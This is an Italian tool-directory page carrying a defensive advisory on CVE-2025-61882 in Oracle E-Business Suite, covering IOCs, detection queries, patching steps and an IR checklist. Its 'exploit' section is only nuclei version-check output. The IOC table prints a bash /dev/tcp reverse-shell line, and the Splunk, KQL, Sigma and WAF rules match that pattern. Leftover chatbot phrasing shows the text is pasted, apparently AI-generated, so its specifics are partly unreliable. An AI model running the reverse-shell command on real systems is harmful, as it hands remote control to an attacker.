Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Blackash-CVE-2025-61882 — Fornisce un advisory dettagliato su CVE-2025-61882 con analisi tecnica, IOC, query di rilevamento e un template di exploit basato su nuclei per la RCE pre-autenticazione in Oracle E-Business Suite. | Kitploit
Strumenti/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingThreat IntelligenceRisposta agli Incidenti
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Fornisce un advisory dettagliato su CVE-2025-61882 con analisi tecnica, IOC, query di rilevamento e un template di exploit basato su nuclei per la RCE pre-autenticazione in Oracle E-Business Suite.

Vedi Repository
210 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️🚨 CVE‑2025‑61882 — Esecuzione Remota di Codice Critica Pre‑Autenticazione in Oracle E‑Business Suite (EBS) 🚨🛡️

Riepilogo breve: Esecuzione remota di codice critica pre‑autenticazione in Oracle E‑Business Suite (EBS) — interessa le versioni 12.2.3 → 12.2.14, CVSS 9.8, sfruttata attivamente in natura (segnalate attività di ransomware/estorsione). ([oracle.com][1])


📌 Fatti rapidi (tabella)

CampoDettagli
🆔 CVECVE‑2025‑61882
🧾 Prodotto / ComponenteOracle E‑Business Suite (EBS) — integrazione Concurrent Processing / BI Publisher
📦 Versioni interessate12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ TipoEsecuzione remota di codice (RCE) — nessuna autenticazione richiesta
🔥 Sfruttata in naturaSì — segnalate campagne di sfruttamento di massa / estorsione
📅 Divulgazione / cronologiaOttobre 2025 (avviso del fornitore + writeup pubblici). ([oracle.com][1])

(Quanto sopra consolidato da avviso del fornitore, NVD/CISA e molteplici analisi dei fornitori.) ([oracle.com][1])


💥 Impatto (tabella)

Area di impattoCosa significa
🔓 RiservatezzaGli attaccanti possono leggere dati sensibili HR/finanziari/ERP
🛠️ IntegritàGli attaccanti possono modificare record, creare backdoor o alterare configurazioni
⚡ DisponibilitàGli attaccanti possono interrompere i servizi, eseguire ransomware o distruggere i backup
🧭 Livello di rischioEstremo — RCE pre‑autenticazione su sistema ERP critico → possibile pivot completo sul dominio

Riferimenti che segnalano sfruttamento ad alto impatto e collegamenti a ransomware. ([Rapid7][2])


🛠️ Riepilogo tecnico (conciso)

  • Vettore: Le richieste HTTP/HTTPS verso endpoint web EBS esposti attivano una catena di vulnerabilità nell'integrazione Concurrent Processing / BI Publisher che porta all'esecuzione remota di codice. ([oracle.com][1])
  • Complessità: Bassa (nessuna autenticazione, nessuna interazione con l'utente). ([nvd.nist.gov][3])
  • Payload osservati: pattern di reverse shell, web shell, script rilasciati utilizzati per l'esfiltrazione di dati ed estorsione. ([Rapid7][2])

🕵️‍♀️ Indicatori di Compromissione (IOC) — esempi (tabella)

Oracle e i team di incident response hanno pubblicato gli IOC; di seguito sono riportati esempi rappresentativi segnalati negli avvisi e nei writeup dei fornitori. Cercate questi pattern nei log e negli endpoint. ([oracle.com][1])

TipoEsempio
🌐 IP (osservati)200.107.207.26, 185.181.60.11 (indirizzi di esempio segnalati)
🧾 Pattern di comandosh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell)
🗂️ Hash di fileDiversi hash SHA‑256 per script di exploit sospetti (vedere l'avviso del fornitore per l'elenco completo)
🕳️ ArtefattiWeb shell inattese, nuovi cronjob, connessioni in uscita sospette verso IP/porte insoliti

Se desiderate l'elenco completo degli IOC (IP, hash completi, nomi file) posso incollarlo qui — dite "incolla IOC". (Nessun link.)


🧭 Cronologia (compatta)

DataEvento
9 agosto 2025Prima attività di sfruttamento nel mondo reale segnalata (telemetria del fornitore). ([crowdstrike.com][4])
Inizio ottobre 2025Oracle ha emesso un avviso di sicurezza / disponibilità di patch per EBS. ([oracle.com][1])
6–7 ottobre 2025CISA ha aggiunto la CVE al suo catalogo Known Exploited Vulnerabilities (KEV) (indicazioni per le agenzie federali, scadenza per la mitigazione). ([cisa.gov][5])
Ottobre 2025 (in corso)Molteplici writeup di fornitori e segnalazioni di sfruttamento di massa (CrowdStrike, Rapid7, Tenable, ecc.). ([crowdstrike.com][4])

✅ Azioni immediate raccomandate (tabella dei passaggi)

PrioritàAzioneNote / Specifiche di esempio
1️⃣ CriticaApplicare la patch alle istanze EBS interessateApplicare immediatamente le patch dell'avviso di sicurezza Oracle per le versioni 12.2.3–12.2.14. ([oracle.com][1])
2️⃣ AltaIsolare / limitare l'accesso agli endpoint web EBSBloccare HTTP/HTTPS esposti a Internet verso EBS; consentire solo IP amministrativi fidati o VPN.
3️⃣ AltaAbilitare/regolare le regole WAFDistribuire firme WAF di fornitori/comunità per i pattern di exploit; bloccare payload sospetti. ([Rapid7][2])
4️⃣ AltaCaccia e rilevamentoCercare nei log comandi di reverse shell, scritture di file anomale e connessioni in uscita verso gli IOC.
5️⃣ IncidenteContenere e rispondere se si riscontra una compromissioneIsolare l'host, preservare le prove forensi, cambiare le credenziali, ricostruire da backup puliti.
6️⃣ PolicySegnalare e notificareSe rientrate in requisiti normativi/contrattuali, notificare stakeholder e autorità secondo la policy (le indicazioni CISA/KEV possono applicarsi). ([nvd.nist.gov][3])

💀 Exploit :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml                        

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.
CVE-2025-61882 Oracle E-Business Suite 1
CVE-2025-61882 Oracle E-Business Suite 4

🕵️‍♂️ Query di rilevamento di esempio (pronte per copia/incolla)

Splunk (ricerca del pattern di reverse shell):

root@kitploit:~
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*") 
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw

ELK / Kibana (KQL):

root@kitploit:~
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"

Regola Sigma (concettuale):

root@kitploit:~
title: Oracle EBS Reverse Shell via HTTP
detection:
  selection:
    EventID: 1234
    ProcessCommandLine|contains: "/dev/tcp/"
  condition: selection

(Adattare i nomi dei campi allo schema dei propri log; utilizzare gli IOC per affinare.)


🔐 Esempi di mitigazioni firewall / WAF (esempi)

  • ACL di rete: Bloccare il traffico in ingresso 80/443 verso i server EBS da Internet pubblico; consentire solo VPN di gestione e specifici IP amministrativi.
  • Regola WAF (pseudo): Bloccare richieste contenenti bash -i, /dev/tcp/, base64 -d o pattern tipici di payload di exploit nei corpi POST o nei parametri URL.
  • Rate limiting / geo‑block: Limitare temporaneamente le richieste verso gli endpoint EBS e bloccare il traffico da aree geografiche note per attività dannose, se coerente con le esigenze aziendali.

🧾 Checklist per la patch (rapida)

  1. Eseguire backup e snapshot delle immagini VM ✅
  2. Testare la patch in staging (se possibile) ✅
  3. Applicare la patch dell'avviso di sicurezza Oracle a EBS 12.2.3–12.2.14 ✅ (seguire i passaggi del fornitore: arrestare i servizi, applicare la patch, eseguire le attività post‑installazione) ([oracle.com][1])
  4. Riavviare e validare l'integrità del servizio ✅
  5. Rieseguire la scansione per artefatti di compromissione ed eseguire controlli forensi completi sull'host ✅

🧠 Note su attore della minaccia / sfruttamento

  • Molti fornitori attribuiscono lo sfruttamento attivo a gruppi legati all'estorsione/ransomware (ad es., Cl0p / Graceful Spider o attori correlati) — utilizzato per furto di dati ed estorsione. La fiducia nell'attribuzione varia a seconda del fornitore. ([crowdstrike.com][4])

📋 Per i team SOC / IR — checklist del playbook

  • Triage: Tentativo di exploit in ingresso? Acquisire richiesta HTTP, header, corpo POST.
  • Contenimento: Isolare la rete dell'host interessato.
  • Forensica: Acquisire memoria, immagine del disco, log del server web, log di audit.
  • Rimediare: Ricostruire l'host da immagine pulita se la compromissione è confermata.
  • Recupero: Ripristinare da backup noti‑buoni; ruotare le credenziali.
  • Segnalazione: Registrare l'incidente, notificare gli stakeholder, conformarsi alle indicazioni KEV/CISA se applicabile. ([nvd.nist.gov][3])

🔎 Fonti (breve elenco di reportistica autorevole)

(Elencare le fonti per accuratezza — non incollo link qui ma questi sono i nomi di fornitori/autorità così potete consultarli se necessario.)

  • Avviso di sicurezza Oracle / Disponibilità patch (avviso del fornitore). ([oracle.com][1])
  • NVD / CISA (voce del catalogo KEV CISA e metadati NVD). ([nvd.nist.gov][3])
  • Rapporto tecnico CrowdStrike sulle campagne. ([crowdstrike.com][4])
  • Analisi e FAQ di Rapid7 / Tenable / altri fornitori. ([Rapid7][2])

Ecco un disclaimer professionale, ricco di emoji che potete utilizzare per il vostro report su CVE‑2025‑61882:


⚠️💀 Disclaimer 💀⚠️

Le informazioni fornite in questo report sono solo a scopo di sensibilizzazione, difensivo ed educativo. L'uso di queste informazioni per sfruttare, attaccare o compromettere qualsiasi sistema senza autorizzazione esplicita è illegale e può comportare sanzioni penali e civili.

🔒 Applicare sempre le patch raccomandate, seguire le best practice di sicurezza ed eseguire i test solo in ambienti controllati.

🧾 Questo report non sostituisce gli avvisi ufficiali del fornitore — consultare sempre gli avvisi di sicurezza Oracle e le indicazioni autorizzate per le istruzioni di rimedio definitive.


Scarica lo strumento